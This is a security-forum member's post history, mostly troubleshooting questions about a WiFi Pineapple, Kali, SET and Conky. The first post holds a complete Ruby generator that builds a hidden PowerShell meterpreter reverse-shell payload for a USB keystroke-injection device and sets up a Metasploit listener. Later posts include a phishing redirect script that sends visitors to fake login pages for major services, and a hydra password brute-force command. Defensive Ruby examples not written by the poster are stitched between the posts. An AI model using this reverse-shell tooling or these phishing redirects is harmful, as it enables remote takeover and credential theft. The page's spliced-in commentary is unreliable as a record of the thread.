SystemCrash86

Active Members
  • Posts: 254
  • Joined
  • Last visited
  • Days Won: 1

Everything posted by SystemCrash86

  1. Ducky reverse shell doesn't work

     I have used the following script, which I know used to work and now doesn't. I modified it a bit from the original download to hide the cmd window as the shellcode is being typed. It worked like a charm but now it's not working. Here is the script:

        #!/usr/bin/env ruby
        # Thanks to @mattifestation exploit-monday.com and Dave Kennedy.
        # Written by James Cook @b00stfr3ak44
        require 'base64'

        def print_error(text)
          print "\e[31m[-]\e[0m #{text}"
        end

        def print_success(text)
          print "\e[32m[+]\e[0m #{text}"
        end

        def print_info(text)
          print "\e[34m[*]\e[0m #{text}"
        end

        def get_input(text)
          print "\e[33m[!]\e[0m #{text}"
        end

        def get_host()
          host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1]
          ip = host_name.split('.')
          if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil
            print_error("Not a valid IP\n")
            get_host()
          end
          print_success("Using #{host_name} as server\n")
          return host_name
        end

        def get_port()
          port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1]
          if port == ''
            port = '443'
            print_success("Using #{port}\n")
            return port
          elsif not (1..65535).cover?(port.to_i)
            print_error("Not a valid port\n")
            sleep(1)
            port()
          else
            print_success("Using #{port}\n")
            return port
          end
        end

        def shellcode_gen(msf_path,host,port)
          print_info("Generating shellcode\n")
          execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C`
          shellcode = clean_shellcode(execute)
          powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";})
          encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n")
          return encoded_command
        end

        def clean_shellcode(shellcode)
          shellcode = shellcode.gsub('\\',",0")
          shellcode = shellcode.delete("+")
          shellcode = shellcode.delete('"')
          shellcode = shellcode.delete("\n")
          shellcode = shellcode.delete("\s")
          shellcode[0..4] = ''
          return shellcode
        end

        def ducky_setup(encoded_command)
          print_info("Writing to file\n")
          File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")}
          print_success("File Complete\n")
        end

        def metasploit_setup(msf_path,host,port)
          print_info("Setting up Metasploit this may take a moment\n")
          rc_file = "msf_listener.rc"
          file = File.open("#{rc_file}",'w')
          file.write("use exploit/multi/handler\n")
          file.write("set PAYLOAD #{@set_payload}\n")
          file.write("set LHOST #{host}\n")
          file.write("set LPORT #{port}\n")
          file.write("set EnableStageEncoding true\n")
          file.write("set ExitOnSession false\n")
          file.write("exploit -j")
          file.close
          system("#{msf_path}./msfconsole -r #{rc_file}")
        end

        begin
          if File.exist?('/usr/bin/msfvenom')
            msf_path = '/usr/bin/'
          elsif File.exist?("/opt/metasploit-framework/msfvenom")
            msf_path = ('/opt/metasploit-framework/')
          else
            print_error("Metasploit Not Found!")
            exit
          end
          @set_payload = "windows/meterpreter/reverse_tcp"
          host = get_host()
          port = get_port()
          encoded_command = shellcode_gen(msf_path,host,port)
          ducky_setup(encoded_command)
          msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1]
          print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n")
          metasploit_setup(msf_path,host,port) if msf_setup == 'yes'
          print_info("Good Bye!\n")
        end

     And I get the following error:

        root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb
        [!] Enter the host ip to listen on: 192.168.0.2
        [+] Using 192.168.0.2 as server
        [!] Enter the port you would like to use or leave blank for [443]: 443
        [+] Using 443
        [*] Generating shellcode
        No platform was selected, choosing Msf::Module::Platform::Windows from the payload
        No Arch selected, selecting Arch: x86 from the payload
        Found 0 compatible encoders
        ./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
                from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode'
                from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen'
                from ./reverse_powershell_ducky2.rb:90:in `<main>'
        root@SystemCrash86:/usr/share/simple-ducky/payloads#

     Everything is up to date and this script used to work, but now I get those errors.
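The script in the post above hands PowerShell its payload as `-enc <base64 of UTF-16LE text>`, the same encoding its `Base64.encode64(...encode("utf-16le"))` line produces. From the defender's side the useful tool is the reverse of that: a decoder that turns a logged `powershell ... -enc ...` command line back into readable text and reports which in-memory-execution building blocks (`Add-Type`, `VirtualAlloc`, `CreateThread`, `memset`, `iex`) it contains. The Ruby below is an added example written for this page, not code from the post or from the simple-ducky project; the indicator table and the sample command line are constructed here, and the sample script is deliberately inert (it only builds strings).

```ruby
# Added example, not part of the forum post or the simple-ducky project.
# Decodes the argument behind PowerShell's -enc switch (base64 of UTF-16LE
# text, which is what the script above builds with
# Base64.encode64(cmd.encode("utf-16le")).delete("\r\n")) and reports the
# in-memory-execution indicators present in the decoded text. The indicator
# names come from the Add-Type/VirtualAlloc/CreateThread pattern in that script.
require 'base64'

INDICATORS = {
  'Add-Type'     => 'compiles C# at run time (P/Invoke definitions)',
  'VirtualAlloc' => 'allocates memory; the script requests protection 0x40 (PAGE_EXECUTE_READWRITE)',
  'CreateThread' => 'starts a thread at an arbitrary address',
  'memset'       => 'writes bytes into the allocated region one at a time',
  'iex'          => 'Invoke-Expression of a constructed string',
  '-enc'         => 'a second encoded command nested inside the first',
}.freeze

# Turn the base64/UTF-16LE blob back into readable UTF-8 text.
# Returns nil for input that is not valid base64 or not valid UTF-16LE
# (for example an odd number of bytes, which cannot be UTF-16).
def decode_encoded_command(b64)
  raw = Base64.strict_decode64(b64)
  raw.force_encoding('UTF-16LE').encode('UTF-8')
rescue ArgumentError, Encoding::InvalidByteSequenceError, Encoding::UndefinedConversionError
  nil
end

# Find the -enc / -EncodedCommand argument in a command line, decode it and
# return { decoded: String or nil, hits: { indicator => explanation } }.
def inspect_command_line(cmdline)
  m = cmdline.match(/-(?:enc|encodedcommand)\s+([A-Za-z0-9+\/=]+)/i)
  decoded = m && decode_encoded_command(m[1])
  return { decoded: nil, hits: {} } unless decoded
  { decoded: decoded, hits: INDICATORS.select { |name, _| decoded.include?(name) } }
end

# Constructed sample: a harmless script (it only builds strings) encoded the
# same way the tool encodes its payload, so the decoder sees realistic input.
SAMPLE_SCRIPT = '$c = "VirtualAlloc CreateThread definitions go here";' \
                '$w = Add-Type -memberDefinition $c -Name "Win32" -passthru;' \
                'iex "& powershell -nop -noni -enc $gq"'
SAMPLE_CMDLINE = 'powershell -nop -wind hidden -noni -enc ' +
                 Base64.encode64(SAMPLE_SCRIPT.encode('utf-16le')).delete("\r\n")

if __FILE__ == $0
  result = inspect_command_line(SAMPLE_CMDLINE)
  puts "decoded: #{result[:decoded]}"
  result[:hits].each { |name, why| puts "  [!] #{name}: #{why}" }
end
```

Feed it command lines from whatever records process creation on your hosts; anything that decodes to text containing `VirtualAlloc` and `CreateThread` together deserves a look regardless of what the outer command line was called.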
  2. In my Karma log I only have one connected client appear at any one time, then disappear, but the client is still connected.
  3. I too am experiencing this and I would like to know if this is normal.
  4. Yes, it's a Mark 5 with two antennas and I am able to turn on the wlan1 interface using the WiFi Manager infusion. I then SSH'd into the Pineapple and issued the iwconfig command:

        root@Pineapple:~# iwconfig
        lo        no wireless extensions.

        wlan1     IEEE 802.11bg  ESSID:off/any
                  Mode:Managed  Access Point: Not-Associated  Tx-Power=27 dBm
                  RTS thr:off  Fragment thr:off
                  Encryption key:off
                  Power Management:off

        wlan0     IEEE 802.11bgn  Mode:Master  Tx-Power=18 dBm
                  RTS thr:off  Fragment thr:off
                  Power Management:off

        eth0      no wireless extensions.

        br-lan    no wireless extensions.

  5. Yes, it's the new Mark 5 Pineapple. My interface between the Pineapple and my laptop is eth0 and my interface between the laptop and the internet is wlan0. I didn't think I would get a wlan1 interface until I plugged in another wifi adapter like my Alfa - was I wrong?
  6. Oh yeah, I forgot that, my mistake, sorry. I SSH'd into the Pineapple and typed ifconfig:

        root@Pineapple:~# ifconfig
        br-lan    Link encap:Ethernet  HWaddr 00:13:37:A5:08:3A
                  inet addr:172.16.42.1  Bcast:172.16.42.255  Mask:255.255.255.0
                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                  RX packets:3573 errors:0 dropped:846 overruns:0 frame:0
                  TX packets:2194 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:0
                  RX bytes:565512 (552.2 KiB)  TX bytes:262303 (256.1 KiB)

        eth0      Link encap:Ethernet  HWaddr 00:13:37:A5:08:3A
                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                  RX packets:3789 errors:0 dropped:68 overruns:0 frame:0
                  TX packets:2191 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:1000
                  RX bytes:654908 (639.5 KiB)  TX bytes:262121 (255.9 KiB)
                  Interrupt:4

        lo        Link encap:Local Loopback
                  inet addr:127.0.0.1  Mask:255.0.0.0
                  UP LOOPBACK RUNNING  MTU:16436  Metric:1
                  RX packets:658 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:658 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:0
                  RX bytes:71448 (69.7 KiB)  TX bytes:71448 (69.7 KiB)

        wlan0     Link encap:Ethernet  HWaddr 00:13:37:A5:08:3A
                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                  RX packets:0 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:2265 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:1000
                  RX bytes:0 (0.0 B)  TX bytes:523303 (511.0 KiB)

  7. Oh right, sorry, where would I find that? I'm quite new to the Pineapple.
  8. In Kali Linux with my Pineapple attached, ifconfig is:

        root@SystemCrash86:~# ifconfig
        eth0      Link encap:Ethernet  HWaddr 40:61:86:b6:42:58
                  inet addr:172.16.42.42  Bcast:172.16.42.255  Mask:255.255.255.0
                  inet6 addr: fe80::4261:86ff:feb6:4258/64 Scope:Link
                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                  RX packets:31062 errors:0 dropped:6 overruns:0 frame:0
                  TX packets:38866 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:1000
                  RX bytes:3641875 (3.4 MiB)  TX bytes:24519611 (23.3 MiB)

        lo        Link encap:Local Loopback
                  inet addr:127.0.0.1  Mask:255.0.0.0
                  inet6 addr: ::1/128 Scope:Host
                  UP LOOPBACK RUNNING  MTU:65536  Metric:1
                  RX packets:89317 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:89317 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:0
                  RX bytes:14934572 (14.2 MiB)  TX bytes:14934572 (14.2 MiB)

        wlan0     Link encap:Ethernet  HWaddr 6c:62:6d:12:0a:c4
                  inet addr:192.168.1.65  Bcast:192.168.1.255  Mask:255.255.255.0
                  inet6 addr: fe80::6e62:6dff:fe12:ac4/64 Scope:Link
                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                  RX packets:21563 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:15870 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:1000
                  RX bytes:23393743 (22.3 MiB)  TX bytes:1686932 (1.6 MiB)

        root@SystemCrash86:~#
  9. UPDATE: OK, after trying to fix this with no success I went on my laptop and booted up Kali Linux and connected the Pineapple to it. Then in Kali Linux I opened up a virtual machine of Windows XP - unpatched, it's what I use to test with in Kali Linux. I turned on DNS Spoof on the Pineapple expecting it to have no effect like before, and I loaded up Internet Explorer in my unpatched Windows XP machine. For some reason I can't explain, it worked - I don't know how it worked but it did. Why would it work in my unpatched Windows XP virtual machine and nowhere else? My other operating systems include Windows 7 and Ubuntu 13.10, both fully patched and running the latest Firefox browser, and it doesn't work.
  10. I am connected on my desktop to the new WiFi Pineapple Mark 5's wifi - the Mark 5 is connected to my laptop. DNS Spoof isn't working (I previously made a thread about this but it got moved over here). If you read my last thread, I mentioned that all I changed on this new Mark 5 was the redirect.php, which I had done and used on the Mark 4 without any problems. I also checked the spoofhost for any extra characters and there are none. While connected to the Pineapple's wifi I can surf the web without any issue whatsoever; dnsspoof is turned on but does not redirect pages. Opening up a terminal and pinging a non-spoofed website says:

        systemcrash86@SystemCrash86:~$ ping www.google.com
        PING www.google.com (31.55.167.217) 56(84) bytes of data.
        64 bytes from 31.55.167.217: icmp_seq=1 ttl=57 time=23.9 ms
        From 172.16.42.1: icmp_seq=2 Redirect Host(New nexthop: 172.16.42.42)
        From 172.16.42.1 icmp_seq=2 Redirect Host64 bytes from 31.55.167.217: icmp_seq=2 ttl=57 time=22.5 ms
        From 172.16.42.1 icmp_seq=3 Redirect HostFrom 172.16.42.1: icmp_seq=3 Redirect Host(New nexthop: 172.16.42.42)
        From 172.16.42.1 icmp_seq=4 Redirect Host64 bytes from 31.55.167.217: icmp_seq=3 ttl=57 time=22.5 ms
        From 172.16.42.1 icmp_seq=5 Redirect HostFrom Pineapple.lan (172.16.42.1): icmp_seq=4 Redirect Host(New nexthop: 172.16.42.42)
        From 172.16.42.1 icmp_seq=6 Redirect Host64 bytes from 31.55.167.217: icmp_seq=4 ttl=57 time=22.6 ms
        From 172.16.42.1 icmp_seq=7 Redirect HostFrom 172.16.42.1: icmp_seq=5 Redirect Host(New nexthop: 172.16.42.42)
        ^CFrom 172.16.42.1 icmp_seq=8 Redirect Host
        --- www.google.com ping statistics ---
        8 packets transmitted, 4 received, +7 errors, 50% packet loss, time 75279ms
        rtt min/avg/max/mdev = 22.543/22.929/23.974/0.632 ms, pipe 4
        systemcrash86@SystemCrash86:~$

      While pinging a spoofed website, for example Facebook, says:

        systemcrash86@SystemCrash86:~$ ping www.facebook.com
        PING star.c10r.facebook.com (31.13.80.33) 56(84) bytes of data.
        64 bytes from edge-star-shv-03-cdg1.facebook.com (31.13.80.33): icmp_seq=1 ttl=82 time=38.6 ms
        From 172.16.42.1: icmp_seq=2 Redirect Host(New nexthop: 172.16.42.42)
        From 172.16.42.1 icmp_seq=2 Redirect Host64 bytes from edge-star-shv-03-cdg1.facebook.com (31.13.80.33): icmp_seq=2 ttl=82 time=37.3 ms
        From 172.16.42.1 icmp_seq=3 Redirect HostFrom 172.16.42.1: icmp_seq=3 Redirect Host(New nexthop: 172.16.42.42)
        From 172.16.42.1 icmp_seq=4 Redirect Host64 bytes from edge-star-shv-03-cdg1.facebook.com (31.13.80.33): icmp_seq=3 ttl=82 time=37.4 ms
        From 172.16.42.1 icmp_seq=5 Redirect HostFrom 172.16.42.1: icmp_seq=4 Redirect Host(New nexthop: 172.16.42.42)
        ^CFrom 172.16.42.1 icmp_seq=6 Redirect Host
        --- star.c10r.facebook.com ping statistics ---
        6 packets transmitted, 3 received, +5 errors, 50% packet loss, time 41155ms
        rtt min/avg/max/mdev = 37.374/37.814/38.660/0.638 ms, pipe 3
        systemcrash86@SystemCrash86:~$

      I am stuck, I have no idea how to fix this.
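The ping output in the post above is worth reading for what it shows apart from the DNS question: every few packets the gateway 172.16.42.1 sends an ICMP "Redirect Host" telling the client to send traffic via 172.16.42.42 (the laptop's eth0 address from the earlier ifconfig post). On a client you do not control, that is exactly the kind of message to surface, because a gateway that steers traffic to a different host is putting that host in the path. The Ruby below is an added example, not code from the post; it extracts those redirect messages from ping output and summarises who is redirecting whom to where. `PING_OUTPUT` is a constructed excerpt shaped like the post's output, including the run-together lines, and the default gateway address passed in is an assumption taken from the same output.

```ruby
# Added example, not from the forum post: pick the ICMP "Redirect Host" lines
# out of ping output and summarise which gateway is steering the client to
# which next hop. PING_OUTPUT is a constructed excerpt shaped like the output
# quoted in the post (the run-together lines are how ping printed them there).
PING_OUTPUT = <<~'OUT'
  PING www.google.com (31.55.167.217) 56(84) bytes of data.
  64 bytes from 31.55.167.217: icmp_seq=1 ttl=57 time=23.9 ms
  From 172.16.42.1: icmp_seq=2 Redirect Host(New nexthop: 172.16.42.42)
  From 172.16.42.1 icmp_seq=2 Redirect Host64 bytes from 31.55.167.217: icmp_seq=2 ttl=57 time=22.5 ms
  From 172.16.42.1 icmp_seq=3 Redirect HostFrom 172.16.42.1: icmp_seq=3 Redirect Host(New nexthop: 172.16.42.42)
  From 172.16.42.1 icmp_seq=5 Redirect HostFrom Pineapple.lan (172.16.42.1): icmp_seq=4 Redirect Host(New nexthop: 172.16.42.42)
  --- www.google.com ping statistics ---
OUT

Redirect = Struct.new(:gateway, :seq, :nexthop)

IPV4 = /\d{1,3}(?:\.\d{1,3}){3}/
# Matches "From <ip>: ..." as well as "From <name> (<ip>): ..." when the
# line carries the full "Redirect Host(New nexthop: <ip>)" message; the
# truncated "Redirect Host" fragments without a next hop are ignored.
REDIRECT_RE = /From\s+(?:\S+\s+\()?(#{IPV4})\)?:?\s+icmp_seq=(\d+)\s+Redirect Host\(New nexthop:\s+(#{IPV4})\)/

# One Redirect per line that carries a "New nexthop" message.
def parse_redirects(text)
  text.each_line.map do |line|
    m = REDIRECT_RE.match(line)
    Redirect.new(m[1], m[2].to_i, m[3]) if m
  end.compact
end

# Count redirects per (gateway, nexthop) pair.
def summarize_redirects(redirects)
  redirects.group_by { |r| [r.gateway, r.nexthop] }.transform_values(&:size)
end

# Next hops other than the default gateway the client was handed. A gateway
# normally forwards traffic itself rather than pointing clients at another host.
def unexpected_nexthops(redirects, default_gateway)
  redirects.map(&:nexthop).uniq.reject { |ip| ip == default_gateway }
end

if __FILE__ == $0
  redirects = parse_redirects(PING_OUTPUT)
  summarize_redirects(redirects).each do |(gw, hop), n|
    puts "#{gw} redirected the client to #{hop} #{n} time(s)"
  end
  # 172.16.42.1 is the gateway address from the post, assumed here as the default route.
  puts "next hops other than the gateway: #{unexpected_nexthops(redirects, '172.16.42.1').join(', ')}"
end
```

The same parser works on a saved `ping` transcript from any Linux client; if it ever reports a next hop that is not your gateway, check the client's routing table and who owns that address before trusting anything else on the network.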
  11. After I couldn't find anything in the www folder I looked at the /etc/pineapple/spoofhost file and found nothing except the hosts I want to dnsspoof, no extra characters or anything. I'm very confused.
  12. I SSH'd into the Pineapple and went to the www folder and checked the index.php file and the other files in that folder, and still nothing - did I miss something?
  13. I had a look at the Configuration tile and DNS Spoof tab, and the hosts and index.php have no extra characters at all - not even the ^M - and the same goes for the dnsspoof infusion. All I changed was my redirect.php, that's it, that's all I changed, and when I start DNS Spoof - either from the Configuration tile or the actual DNS Spoof tile - I get no errors at all. On my other PC I browse to the spoofed site, e.g. Facebook or Twitter, and the actual site loads. I haven't seen any extra characters.
  14. This is my redirect.php - the only thing I changed; the error.php and the index.php remain untouched:

        <?php
        $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        if (strpos($ref, "hotmail")){
          header('Status: 302 Found');
          header('Location: hotmail.htm');
        }
        if (strpos($ref, "facebook")){
          header('Status: 302 Found');
          header('Location: facebook.htm');
        }
        if (strpos($ref, "twitter")){
          header('Status: 302 Found');
          header('Location: twitter.htm');
        }
        if (strpos($ref, "gmail")){
          header('Status: 302 Found');
          header('Location: gmail.htm');
        }
        if (strpos($ref, "youtube")){
          header('Status: 302 Found');
          header('Location: youtube.htm');
        }
        if (strpos($ref, "vimeo")){
          header('Status: 302 Found');
          header('Location: vimeo.htm');
        }
        if (strpos($ref, "linkedin")){
          header('Status: 302 Found');
          header('Location: linkedin.htm');
        }
        if (strpos($ref, "instagram")){
          header('Status: 302 Found');
          header('Location: instagram.html');
        }
        if (strpos($ref, "plus.google")){
          header('Status: 302 Found');
          header('Location: googleplus.htm');
        }
        if (strpos($ref, "netflix")){
          header('Status: 302 Found');
          header('Location: netflix.htm');
        }
        if (strpos($ref, "ustream")){
          header('Status: 302 Found');
          header('Location: ustream.htm');
        }
        if (strpos($ref, "dropbox")){
          header('Status: 302 Found');
          header('Location: dropbox.htm');
        }
        if (strpos($ref, "blogger")){
          header('Status: 302 Found');
          header('Location: blogger.htm');
        }
        if (strpos($ref, "outlook")){
          header('Status: 302 Found');
          header('Location: outlook.htm');
        }
        require('error.php');
        ?>
        <iframe style="display:none;" src="/get/get.php"></iframe>

      It worked for my Mark 4 so I assumed it would work for my Mark 5 - was that an error on my part?
  15. I got the new wifi pineapple mark 5 and everything works great, except for the dnsspoof - it just doesn't work at all. Is this a common issue with the new pineapple or is it just me and is there a possible fix?
  16. Sorry, my bad, I found a solution. Sorry, I didn't mean to waste anyone's time. I don't have permission to delete this thread, so if one of the admins on here sees this, could you do so?
  17. I am using Kali Linux and I installed the simple-ducky script with no errors. Through the process it updated my Java JDK from version 6 to 7 - again it showed me no errors. However, when I do apt-get upgrade from my Kali terminal I get a bunch of errors:

        root@SystemCrash86:~# apt-get upgrade
        Reading package lists... Done
        Building dependency tree
        Reading state information... Done
        The following packages will be upgraded:
          icedtea-netx icedtea-netx-common
        2 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
        Need to get 876 kB of archives.
        After this operation, 0 B of additional disk space will be used.
        Do you want to continue [Y/n]? y
        Err http://security.kali.org/kali-security/ kali/updates/main icedtea-netx-common all 1.4-3~deb7u2
          Could not connect to archive-5.kali.org:80 (50.7.97.58). - connect (111: Connection refused)
        Err http://security.kali.org/kali-security/ kali/updates/main icedtea-netx amd64 1.4-3~deb7u2
          Unable to connect to archive-5.kali.org:http:
        Failed to fetch
        Failed to fetch
        E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

      I get this every time, ever since I installed this script. Anyone got any ideas?
  18. Just two questions about the latest release of the Pineapple firmware update, 3.0.0. I like the new interface and realise that painstaking time and hard work went into it, and it shows, so keep up the great work guys. My first question would be: with this new interface, where are the dnsspoof log and the phishing logs located? In the old interface they were under the logs tab, but I'm not sure where they are now. I recently upgraded and wanted to try it out, so I upgraded and installed some infusions on USB with no errors or problems, and I set two laptops up, one with Windows and Internet Explorer and the other my usual Kali Linux machine which the Pineapple is connected to. I started dnsspoof on the Pineapple and on my Windows machine I navigated to Facebook, Twitter etc., all of which loaded up no problem, so I entered my lamepassword and again no errors. So I'm just wondering where these logs are in the new Pineapple interface. Also, I can scp into the Pineapple but still can't locate them. And I'm not sure if my second question has been answered already; if it has then I apologize. My Pineapple log file is being cluttered by this: "Pineapple user.notice root: Mobile.Keepalive: Still Redialing..." Does someone know how to sort this out, as it's filling up my log file very rapidly?
  19. I know, that's why I thought I would try here and not bother him. I sent one email, that's enough; he's very busy with other things like you said, DerbyCon. I was hoping someone on here might have an answer.
  20. Sent an email but haven't got a reply, he is very busy. How would I simplify my testing? I have done the bare minimum to make it work. I get no errors or anything; it's just that the email created in SET only sends the first line of the email to my account, and I'm not sure how to edit the Python scripts to make it work.
  21. Can somebody help me figure out why the latest version of the Social Engineering Toolkit (SET) will not send the full email? When using credential harvester with webattack turned on in the config file, you get prompted to send an email - however SET only sends the first line of the email and that's it. Hope somebody can help.
  22. After having made the switch from BackTrack 5 to Kali I thought I would give hydra a try. So I put my password in the middle of my password list and ran it. However, it threw up some errors about my password list being too long - huh? I don't get it, and yet if I run the same command with a much, much shorter password list I have no problems.

        root@SystemCrash86:~# hydra -Vv -l "myemail@hotmail.co.uk -P password.lst pop3.live.com pop3
        Hydra v7.4.2 ©2012 by van Hauser/THC & David Maciejak - for legal purposes only

        Hydra (http://www.thc.org/thc-hydra) starting at 2013-07-29 17:04:27
        [ERROR] Maximum number of passwords is 50000000, this file has 1195353094 entries.

      Can someone help, as I don't know how this happens? And besides, isn't a bigger password list preferable, and yet I can't use it with hydra?
  23. Is there something wrong with the wp4.sh script, because I can no longer get hold of it using wget wifipineapple.com/wp4.sh? It's just not there anymore.
  24. As an update, I also tried to use the terminal to run conky as well and it showed a few errors that I have no idea how to fix:

        christopher@christopher-OEM:~$ conky -c /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 281: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 282: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 283: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 288: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 289: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 294: no such configuration: '${voffset'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 295: no such configuration: '${voffset'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 301: no such configuration: '${voffset'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 302: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 309: no such configuration: '${color1}${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 310: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 311: no such configuration: '${voffset'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 312: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 317: no such configuration: '${voffset'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 318: no such configuration: '${goto'
        Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 323: no such configuration: '${image'
        Conky: missing text block in configuration; exiting
        ***** Imlib2 Developer Warning ***** :
        This program is calling the Imlib call:
        imlib_context_free();
        With the parameter:
        context
        being NULL. Please fix your program.
        christopher@christopher-OEM:~$

  25. I did that and it didn't work; I changed it, then I rebooted and nothing. I have Conky Manager and it's set to run at boot, and it works for the other two widgets, just not this one. I made the script executable and placed it in Startup Applications and still nothing. It still doesn't load on boot.